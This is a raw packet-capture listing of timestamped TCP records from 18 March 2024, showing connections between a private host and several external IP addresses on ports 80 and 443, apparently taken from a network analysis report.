                                                                                    Mar 18, 2024 14:47:27.977463961 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.977720976 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.977730989 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.977837086 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.979382038 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.979541063 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.979549885 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.979696035 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.981419086 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.981650114 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.981662035 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.981842041 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.983340979 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.983594894 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.983606100 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.983890057 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.985333920 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.985536098 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.986133099 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.986366034 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.986375093 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.986521006 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.988140106 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.988291025 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.988298893 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.988523006 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.990025997 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.990293026 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.990303993 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.990578890 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.991842031 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.992086887 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:47:27.992096901 CET44349758142.250.65.161192.168.11.20
                                                                                    Mar 18, 2024 14:47:27.992317915 CET49758443192.168.11.20142.250.65.161
                                                                                    Mar 18, 2024 14:48:54.022397995 CET8049784198.177.123.106192.168.11.20
                                                                                    Mar 18, 2024 14:48:54.022551060 CET4978480192.168.11.20198.177.123.106
                                                                                    Mar 18, 2024 14:48:54.872890949 CET4978480192.168.11.20198.177.123.106
                                                                                    Mar 18, 2024 14:48:55.889312029 CET4978680192.168.11.20198.177.123.106
                                                                                    Mar 18, 2024 14:48:56.062629938 CET8049786198.177.123.106192.168.11.20
                                                                                    Mar 18, 2024 14:48:56.062818050 CET4978680192.168.11.20198.177.123.106
                                                                                    Mar 18, 2024 14:48:56.063123941 CET4978680192.168.11.20198.177.123.106
                                                                                    Mar 18, 2024 14:48:56.241218090 CET8049786198.177.123.106192.168.11.20
                                                                                    Mar 18, 2024 14:48:56.349569082 CET8049786198.177.123.106192.168.11.20
                                                                                    Mar 18, 2024 14:48:56.349653006 CET8049786198.177.123.106192.168.11.20
                                                                                    Mar 18, 2024 14:48:56.349940062 CET4978680192.168.11.20198.177.123.106
                                                                                    Mar 18, 2024 14:48:56.350044012 CET4978680192.168.11.20198.177.123.106
                                                                                    Mar 18, 2024 14:48:56.528439045 CET8049786198.177.123.106192.168.11.20
                                                                                    Mar 18, 2024 14:49:01.604963064 CET4978780192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:01.784318924 CET804978746.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:01.784523964 CET4978780192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:01.784764051 CET4978780192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:01.964198112 CET804978746.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:01.965683937 CET804978746.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:01.965713024 CET804978746.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:01.965922117 CET4978780192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:03.292920113 CET4978780192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:04.308464050 CET4978880192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:04.487023115 CET804978846.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:04.487248898 CET4978880192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:04.487514973 CET4978880192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:04.665859938 CET804978846.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:04.667092085 CET804978846.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:04.667119026 CET804978846.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:04.667340040 CET4978880192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:05.995408058 CET4978880192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:07.011110067 CET4978980192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:07.206758022 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.207158089 CET4978980192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:07.208565950 CET4978980192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:07.208615065 CET4978980192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:07.208666086 CET4978980192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:07.404213905 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.404326916 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.404428005 CET4978980192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:07.404474974 CET4978980192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:07.404525042 CET4978980192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:07.404735088 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.404745102 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.404773951 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.404894114 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.405035973 CET4978980192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:07.405071974 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.405081987 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.405090094 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.405097008 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.405205011 CET4978980192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:07.405425072 CET4978980192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:07.600114107 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.600212097 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.600302935 CET4978980192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:07.600339890 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.600351095 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.600553989 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.600621939 CET4978980192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:07.600668907 CET4978980192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:07.600786924 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.600930929 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.601058006 CET4978980192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:07.601229906 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.601383924 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.601558924 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.601756096 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.602252007 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.602421045 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.796058893 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.796341896 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.796468019 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.796605110 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.796628952 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.796719074 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.796840906 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.796852112 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.797123909 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:07.797137022 CET804978946.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:09.729244947 CET4979080192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:09.905560970 CET804979046.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:09.905795097 CET4979080192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:09.906007051 CET4979080192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:10.082673073 CET804979046.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:10.084331036 CET804979046.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:10.084362984 CET804979046.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:10.084592104 CET4979080192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:10.084743977 CET4979080192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:49:10.260776043 CET804979046.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:49:16.305844069 CET4979180192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:16.487921000 CET804979191.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:16.488091946 CET4979180192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:16.488398075 CET4979180192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:16.670959949 CET804979191.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:16.670984030 CET804979191.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:16.671164989 CET4979180192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:17.992849112 CET4979180192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:19.009121895 CET4979280192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:19.191211939 CET804979291.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:19.191473961 CET4979280192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:19.191752911 CET4979280192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:19.375544071 CET804979291.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:19.375555992 CET804979291.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:19.375706911 CET4979280192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:20.695355892 CET4979280192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:21.711191893 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:21.893050909 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:21.893364906 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:21.894691944 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:21.894714117 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:21.894790888 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:22.076785088 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.076869011 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.076883078 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.076925039 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:22.076982975 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.076992989 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.077100992 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:22.077115059 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.077265978 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:22.077434063 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:22.077569962 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.077604055 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:22.132461071 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:22.258867025 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.258994102 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.259129047 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:22.259269953 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.259322882 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:22.259412050 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.259437084 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:22.259489059 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.259635925 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.259859085 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.259954929 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.260107040 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.301177025 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.440951109 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.440963984 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.441109896 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.441216946 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.441447973 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.441576958 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.441593885 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.441607952 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.441696882 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.441710949 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.441725016 CET804979391.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:22.442418098 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:23.397871971 CET4979380192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.415807962 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.598037958 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.598249912 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.598413944 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.811172009 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.811224937 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.811266899 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.811304092 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.811382055 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.811469078 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.811497927 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.811537981 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.811570883 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.811603069 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.811654091 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.811702013 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.811745882 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.811821938 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.811963081 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.993536949 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993622065 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993647099 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993668079 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993689060 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993796110 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993815899 CET4979580192.168.11.2091.195.240.19
                                                                                    Mar 18, 2024 14:49:24.993818045 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993838072 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993859053 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993881941 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993901968 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:49:24.993921995 CET804979591.195.240.19192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.252011061 CET4981480192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:17.252038002 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.252096891 CET4981480192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:17.252120972 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.252162933 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.252373934 CET4981480192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:17.252382040 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.252427101 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.252492905 CET4981480192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:17.252497911 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.252538919 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.252548933 CET4981480192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:17.252790928 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.252856016 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.252896070 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.253053904 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.253118992 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.253159046 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.253382921 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.253427029 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.253464937 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.418169022 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.418338060 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.418718100 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.418936968 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.419030905 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.419332981 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.419420958 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.419467926 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.419524908 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.419564009 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.419672012 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.419713974 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.421910048 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.421969891 CET8049814217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:17.422430992 CET4981480192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:18.421830893 CET4981480192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:19.437556982 CET4981580192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:19.603183985 CET8049815217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:19.603507042 CET4981580192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:19.603595972 CET4981580192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:19.769117117 CET8049815217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:19.772123098 CET8049815217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:19.772192001 CET8049815217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:19.772239923 CET8049815217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:19.772504091 CET4981580192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:19.772907972 CET4981580192.168.11.20217.70.184.50
                                                                                    Mar 18, 2024 14:52:19.938360929 CET8049815217.70.184.50192.168.11.20
                                                                                    Mar 18, 2024 14:52:26.190814972 CET4981680192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:52:27.201126099 CET4981680192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:52:29.216254950 CET4981680192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:52:33.231051922 CET4981680192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:52:41.244918108 CET4981680192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:52:48.275151968 CET4981680192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:52:49.290729046 CET4981680192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:52:51.305212975 CET4981680192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:52:55.319859982 CET4981680192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:53:03.333775043 CET4981680192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:53:10.364221096 CET4981680192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:53:11.378889084 CET4981680192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:53:13.394049883 CET4981680192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:53:17.408803940 CET4981680192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:53:25.422652960 CET4981680192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:53:32.453115940 CET4981680192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:53:33.452114105 CET4981680192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:53:35.467350006 CET4981680192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:53:39.482135057 CET4981680192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:53:47.495966911 CET4981680192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:53:53.619757891 CET4982480192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:53:54.635046005 CET4982480192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:53:56.650156975 CET4982480192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:54:00.664922953 CET4982480192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:54:01.727864027 CET4982580192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:54:01.882674932 CET804982584.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:01.882956982 CET4982580192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:54:01.883178949 CET4982580192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:54:02.037590027 CET804982584.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:02.037797928 CET804982584.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:04.414433002 CET4982680192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:54:04.569036961 CET804982684.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:04.569329977 CET4982680192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:54:04.569559097 CET4982680192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:54:04.724035978 CET804982684.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:04.724211931 CET804982684.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:07.085791111 CET4982780192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:54:07.240740061 CET804982784.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:07.241019011 CET4982780192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:54:07.242306948 CET4982780192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:54:07.242408991 CET4982780192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:54:07.398039103 CET804982784.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:07.398107052 CET804982784.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:07.398226023 CET804982784.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:07.398227930 CET4982780192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:54:07.398298979 CET4982780192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:54:07.553394079 CET804982784.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:07.553946972 CET804982784.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:08.678792000 CET4982480192.168.11.20156.232.32.175
                                                                                    Mar 18, 2024 14:54:09.773725033 CET4982880192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:54:09.928585052 CET804982884.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:09.928879976 CET4982880192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:54:09.929078102 CET4982880192.168.11.2084.32.84.32
                                                                                    Mar 18, 2024 14:54:10.083694935 CET804982884.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:10.084013939 CET804982884.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:10.084059954 CET804982884.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:10.084172010 CET804982884.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:10.084201097 CET804982884.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:10.084214926 CET804982884.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:10.084228039 CET804982884.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:10.084252119 CET804982884.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:10.084265947 CET804982884.32.84.32192.168.11.20
                                                                                    Mar 18, 2024 14:54:10.084275961 CET804982884.32.84.32192.168.11.20
